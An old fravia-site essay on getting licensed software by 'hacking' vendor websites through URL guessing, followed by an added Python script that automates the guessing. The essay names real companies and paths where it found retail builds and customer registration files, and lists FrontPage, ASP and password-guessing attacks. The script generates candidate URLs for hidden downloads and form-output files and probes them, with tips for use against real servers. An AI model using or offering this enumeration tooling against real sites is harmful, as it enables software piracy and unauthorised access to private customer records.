The Art of Guessing
Smut sites busting
by .sozni
courtesy of fravia's pages of reverse engineering
(published at fravia's in October 1999, taken from sozni's page)
There are many ways to get registered software. You can buy it, you can get a
copy from a friend or from the internet, you can crack a demo, you can use a serial
number, etc. There are so many ways that if you really want something, you can get
it.
I have noticed that many ActiveX controls are updated frequently. For example,
DataDynamics has been posting a new update for ActiveReports every two weeks. If you
get a pirated copy or a patch, then you never really have the most recent version.
That's why I prefer licensing my software. And that's what my essays are
about: licensing, not cracking software.
I have already talked about a couple of ways to get licensed. There is another way
that I am starting to use more and more. That is to hack the company's web site.
There are many ways to find information on a company's website. Here are some methods that
I use:
- Browse their FTP site looking for hidden directories
- Browse their FTP site looking for stuff out in the open that they have forgotten
about
- Use a FrontPage attack (there are many)
- Exploit weaknesses in Active Server Pages
- View the source of pages (especially registering and purchasing online pages)
- And my favorite: Guessing
I can't believe how many sites I have hacked just by guessing stuff. As I mentioned
before, I got all of the Winternals software just by guessing the URLs. I got a
password for a protoview install by typing random keys (I heard someone else had done the
same thing). I have found serial number lists, serial number generators and
validators, and user registrations.
It's all there for the taking. The trick is to be really good at guessing. The
principle here is that people are predictable. If someone thinks a certain way one
day, most likely they are going to think the same way the next day. Also, people are
usually going to name things with the first thing that comes to mind.
For example, if you wanted to create a directory for downloads, what would you call that
directory? And then, if you have one directory for demos, what would you call the
directory for retail products?
Do you see my point? The Amazing Kreskin works on this principle. He asks people
to think of a vegetable, and most people will think of a carrot. He asks them to
think of a shape, then to think of another shape inside that shape, and most of the time he
knows what they are thinking. Why? Because people are predictable.
How many new computer users do you think use their logon as their password? Many.
And why do you think there are so many common password lists on hacking sites?
Because a lot of people use these common passwords. See? They are
predictable.
Now if a company has a product named ERD Commander and the information about that product
is on a page called erdcmndr.htm and the demo is named
erdcmndr.exe in the demos directory then what do you think the real product is going to be
called? Yep, erdcmndr.exe (in a different directory, of course).
To get the real version of ERD Commander I looked at the demo at www.sysinternals.com then
went to their retail site, www.winternals.com and
downloaded erdcmndr.exe. Of course, I first had to find the download directory, but
that's another story.
And guess what? I just repeated that same process for all of their products.
Remember what I said? If someone thinks a certain way one day, most likely
they are going to think the same way the next day. People are predictable.
Here's another one: Suppose a company has a web page that allows you to register
their software online. It is called regonline.htm. And let's suppose they are
using IIS on Windows NT. And let's suppose they want all these online registrations
to be saved to a text file. What would that file be named, and where would it be
located? These would be my first guesses for www.company.com/regonline.htm:
www.company.com/regonline.txt
www.company.com/_private/regonline.txt
www.company.com/_vti_pvt/regonline.txt
Here's another one: Janus Systems has a page to register online in the
http://www.janusys.com/Support/ directory. These registrations post to a
text file. Now, if your customers were registering their software, these
registrations posted to a text file, and your company were in Mexico,
what would you call this text file?
My guesses would be:
www.janusys.com/support/registration.txt
www.janusys.com/support/register.txt
www.janusys.com/support/registracion.txt
www.janusys.com/support/registra.txt
And you know what? It's the last one (at least it used to be before I first posted this
essay on my mailing list)
The key to guessing is research. Look around at their website and see what they name
things and where they put things. Look at pictures and links and downloads. Do
they like cryptic abbreviations? Is there a method that uses the product version number?
Do you see patterns?
Then, just guess. You would be surprised how many times this works. That is,
if you have really mastered the art of guessing.
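The two cases above (the retail build that keeps the demo's file name, and the registration form that writes to a text file named after itself or after the verb in the owner's language) follow one procedure: collect the names the site already uses, then enumerate the same stems across the directories and extensions people reach for first. The script below is an added example written for this page, not code from the essay or from any of the vendors it names. The directory list, the extension list, the Janus form page name (register.htm) and the constructed site map are assumptions made for the demonstration; probing goes through a caller-supplied exists() function so the block runs offline and the network request is the caller's business.

```python
"""Candidate generator for the URL-guessing procedure described in the essay.

Added example, not the essay author's code. Two heuristics are encoded:
  1. same stem, new place: the stem of erdcmndr.htm / erdcmndr.exe is reused
     for the retail build on another host, directory or extension;
  2. form output: a form's flat-file output is named after the form page, or
     after what the form does (register, registration, registra).
"""
import posixpath
from itertools import product
from urllib.parse import urlsplit, urlunsplit

# Assumed directory names, in the order the essay's own guesses try them.
# "" means "the same directory as the observed file".
DIRS = ["", "_private", "_vti_pvt", "private", "retail", "full",
        "download", "downloads", "files"]
# Assumed extensions a web form might write its records to.
FORM_DATA_EXTS = [".txt", ".log", ".csv", ".dat"]


def split_url(url):
    """'http://h/demos/erdcmndr.exe' -> ('http', 'h', '/demos', 'erdcmndr', '.exe')"""
    p = urlsplit(url)
    directory, name = posixpath.split(p.path)
    stem, ext = posixpath.splitext(name)
    return p.scheme, p.netloc, directory or "/", stem, ext


def make_url(scheme, host, directory, name):
    return urlunsplit((scheme, host, posixpath.join(directory, name), "", ""))


def dedupe(seq):
    """Keep the first occurrence of each item (case-insensitively, because IIS
    on NT treats /Support/x.txt and /support/x.txt as the same file) and keep
    the order: the order of guesses is the whole point."""
    seen, out = set(), []
    for item in seq:
        if item.lower() not in seen:
            seen.add(item.lower())
            out.append(item)
    return out


def guess_same_stem(observed_url, target_host=None, dirs=DIRS, exts=None):
    """Heuristic 1: reuse a stem already seen (demo download, product page)
    on another host and in each candidate directory / extension."""
    scheme, host, directory, stem, ext = split_url(observed_url)
    host = target_host or host
    exts = exts or [ext]
    out = []
    for d, e in product(dirs, exts):
        where = directory if d == "" else "/" + d
        out.append(make_url(scheme, host, where, stem + e))
    return dedupe(out)


def guess_form_output(form_url, extra_stems=(), dirs=DIRS, exts=FORM_DATA_EXTS):
    """Heuristic 2: the flat file a form writes to is named after the form
    page, or after one of the caller-supplied alternative stems (for example
    the Spanish 'registra'). All stems are tried in one directory before the
    next directory is tried."""
    scheme, host, directory, stem, _ = split_url(form_url)
    stems = dedupe([stem, *extra_stems])
    out = []
    for d in dirs:
        where = directory if d == "" else "/" + d
        for s, e in product(stems, exts):
            out.append(make_url(scheme, host, where, s + e))
    return dedupe(out)


def probe(candidates, exists, stop_first=False):
    """Run the guess list through exists(url) -> bool and return the hits in
    guess order. In real use exists() would issue a HEAD/GET and must reject
    custom 'not found' pages that are served with status 200."""
    hits = []
    for url in candidates:
        if exists(url):
            hits.append(url)
            if stop_first:
                break
    return hits


# Constructed site map standing in for the live servers named in the essay.
# The retail directory name is an assumption; the essay does not give it.
FAKE_SITE = {
    "http://www.winternals.com/download/erdcmndr.exe",
    "http://www.janusys.com/Support/registra.txt",
}
_FAKE_LOWER = {u.lower() for u in FAKE_SITE}


def fake_exists(url):
    return url.lower() in _FAKE_LOWER


if __name__ == "__main__":
    retail = guess_same_stem("http://www.sysinternals.com/demos/erdcmndr.exe",
                             target_host="www.winternals.com")
    print(probe(retail, fake_exists))
    forms = guess_form_output("http://www.janusys.com/Support/register.htm",
                              extra_stems=["registration", "registracion", "registra"])
    print(probe(forms, fake_exists, stop_first=True))
```

Two points worth keeping in mind when this is pointed at a real server. IIS on Windows NT is case-insensitive, so candidates differing only in case are the same file and are collapsed before probing; and a guess only counts as a hit when the response is the file itself, not a friendly error page returned with status 200, which is why exists() is left to the caller rather than reduced to "status == 200". The _private and _vti_pvt directories are FrontPage Server Extensions conventions, which is why the essay tries them on an IIS site.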